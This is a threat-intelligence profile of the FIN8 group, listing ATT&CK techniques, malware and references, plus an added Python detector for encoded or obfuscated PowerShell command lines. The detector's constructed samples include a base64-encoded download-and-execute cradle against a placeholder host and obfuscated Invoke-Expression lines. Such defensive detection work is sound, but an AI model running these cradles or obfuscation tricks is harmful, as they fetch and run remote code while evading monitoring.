Introduction
FIN8 is a financially motivated threat group that has been active since at least January 2016 and is known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors [1][4][6]. In June 2021, security researchers observed FIN8 switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants [5][7].
Activities and Tactics
Targeted Sectors: Hospitality, Retail, Entertainment, Insurance, Technology, Chemical, Financial
Country of Origin: 🇷🇺 Russia
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1078 Valid Accounts
- T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol
- T1033 System Owner/User Discovery
- T1518.001 Security Software Discovery
- T1021.001 Remote Desktop Protocol
- T1003.001 LSASS Memory
- T1588.002 Tool
- T1204.002 Malicious File
- T1588.003 Code Signing Certificates
- T1068 Exploitation for Privilege Escalation
- T1546.003 Windows Management Instrumentation Event Subscription
- T1566.002 Spearphishing Link
- T1053.005 Scheduled Task
- T1204.001 Malicious Link
- T1102 Web Service
- T1027.010 Command Obfuscation
- T1070.004 File Deletion
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols
- T1021.002 SMB/Windows Admin Shares
- T1070.001 Clear Windows Event Logs
- T1560.001 Archive via Utility
- T1074.002 Remote Data Staging
- T1105 Ingress Tool Transfer
- T1082 System Information Discovery
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1573.002 Asymmetric Cryptography
- T1055.004 Asynchronous Procedure Call
- T1018 Remote System Discovery
- T1486 Data Encrypted for Impact
- T1482 Domain Trust Discovery
- T1112 Modify Registry
- T1134.001 Token Impersonation/Theft
- T1016.001 Internet Connection Discovery
- T1047 Windows Management Instrumentation
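Two entries in the list above, PowerShell (T1059.001) and Command Obfuscation (T1027.010), leave their clearest footprint in process-creation telemetry: a base64 `-EncodedCommand` payload, cmd.exe caret insertion, or PowerShell string splitting. The following triage script is an added example written for this page, not the page's own material nor any vendor's signature; it runs over constructed sample command lines (labelled as such in the code), not real FIN8 telemetry, and the indicator names and thresholds are this example's own choices.

```python
"""Heuristic triage of Windows process command lines for encoded PowerShell
(T1059.001) and command obfuscation (T1027.010).
Example written for this page; the sample command lines are constructed."""
import base64
import re

# Any abbreviation PowerShell accepts for -EncodedCommand (-e, -ec, -enc, ...)
# followed by a base64 blob. The switch name is checked in code so that
# -ExecutionPolicy <value> does not match.
_ENC_SWITCH = re.compile(r"(?i)(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
_CARET = re.compile(r"\^")                          # cmd.exe escape: p^o^w^e^r
_CONCAT = re.compile(r"'\s*\+\s*'")                 # 'Inv'+'oke' string splitting
_BACKTICK = re.compile(r"`(?![ntr0abfv])[A-Za-z]")  # i`e`x, ignoring `n `t escapes
_CRADLE = re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|net\.webclient)")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, or None if there is none."""
    for m in _ENC_SWITCH.finditer(cmdline):
        switch, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(switch):
            continue                      # some other -e... switch, not a payload
        try:
            # PowerShell expects UTF-16LE text, base64-encoded
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:                # binascii.Error / UnicodeDecodeError
            return None                   # malformed blob: treat as not encoded
    return None


def score_command_line(cmdline):
    """Return (score, indicators); score is the number of indicators hit."""
    indicators = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        indicators.append("encoded-command")
        if _CRADLE.search(decoded):
            indicators.append("download-cradle-in-encoded-payload")
    carets = len(_CARET.findall(cmdline))
    if carets >= 3:                       # a few carets are normal in batch files
        indicators.append("caret-obfuscation(%d)" % carets)
    if len(_CONCAT.findall(cmdline)) >= 2:
        indicators.append("string-concatenation")
    if len(_BACKTICK.findall(cmdline)) >= 2:
        indicators.append("backtick-splitting")
    if _CRADLE.search(cmdline):
        indicators.append("download-cradle")
    return len(indicators), indicators


def triage(command_lines):
    """Return [(cmdline, indicators)] for every line with at least one indicator."""
    hits = []
    for line in command_lines:
        score, indicators = score_command_line(line)
        if score:
            hits.append((line, indicators))
    return hits


def _encode(ps):
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not from any incident): two benign lines,
# three obfuscated ones.
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\cmd.exe /c dir C:\Users",
    "powershell.exe -NoP -W Hidden -Enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    r'cmd.exe /c p^o^w^e^r^s^h^e^l^l -nop -c "Get-Process"',
    "powershell.exe -c \"$a='Invoke'+'-Expres'+'sion'; & $a ('Get'+'-Process')\"",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for line, indicators in triage(SAMPLE_COMMAND_LINES):
        print(", ".join(indicators), "<-", line[:70])
```

The decoder verifies the switch name against the full `EncodedCommand` spelling rather than matching `-e` blindly, which is what keeps `-ExecutionPolicy Bypass` out of the hits; the thresholds (three carets, two concatenations) are deliberately conservative and should be tuned against the environment's own baseline of batch and PowerShell usage.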
ATT&CK technique IDs (denormalized)
- T1003.001
- T1016.001
- T1018
- T1021.001
- T1021.002
- T1027.010
- T1033
- T1047
- T1048.003
- T1053.005
- T1055.004
- T1059.001
- T1059.003
- T1068
- T1070.001
- T1070.004
- T1071.001
- T1074.002
- T1078
- T1082
- T1102
- T1105
- T1112
- T1134.001
- T1204.001
- T1204.002
- T1482
- T1486
- T1518.001
- T1546.003
- T1560.001
- T1566.001
- T1566.002
- T1573.002
- T1588.002
- T1588.003
Notable Indicators of Compromise (IOCs)
No curated IOCs are currently published for this actor. This section will be updated when stable, attributable indicators are available.
Malware and Tools
- PUNCHBUGGY
- PUNCHTRACK
- PowerSniff
- ShellTea
- BADHATCH
- PoSlurp
MITRE ATT&CK Software
- Ping (S0097) — tool
- BADHATCH (S1081) — malware
- PUNCHBUGGY (S0196) — malware
- Ragnar Locker (S0481) — malware
- PUNCHTRACK (S0197) — malware
- dsquery (S0105) — tool
- Net (S0039) — tool
- Nltest (S0359) — tool
- Sardonic (S1085) — malware
- PsExec (S0029) — tool
- Impacket (S0357) — tool
Attribution and Evidence
Country of Origin: Russia
Additional attribution information pending cataloguing.
References
[1] mitre-attack: MITRE ATT&CK. FIN8 (G0061). https://attack.mitre.org/groups/G0061/
[4] FireEye Obfuscation June 2017: Bohannon, D. & Carr, N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. FireEye. Retrieved February 12, 2018.
[5] Bitdefender Sardonic Aug 2021: Budaca, E., et al. (2021, August 25). FIN8 Threat Actor Goes Agile with New Sardonic Backdoor. Bitdefender. Retrieved August 9, 2023.
[6] FireEye Fin8 May 2016: Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. FireEye. Retrieved February 12, 2018.
[7] Symantec FIN8 Jul 2023: Symantec Threat Hunter Team. (2023, July 18). FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware. Symantec. Retrieved August 9, 2023.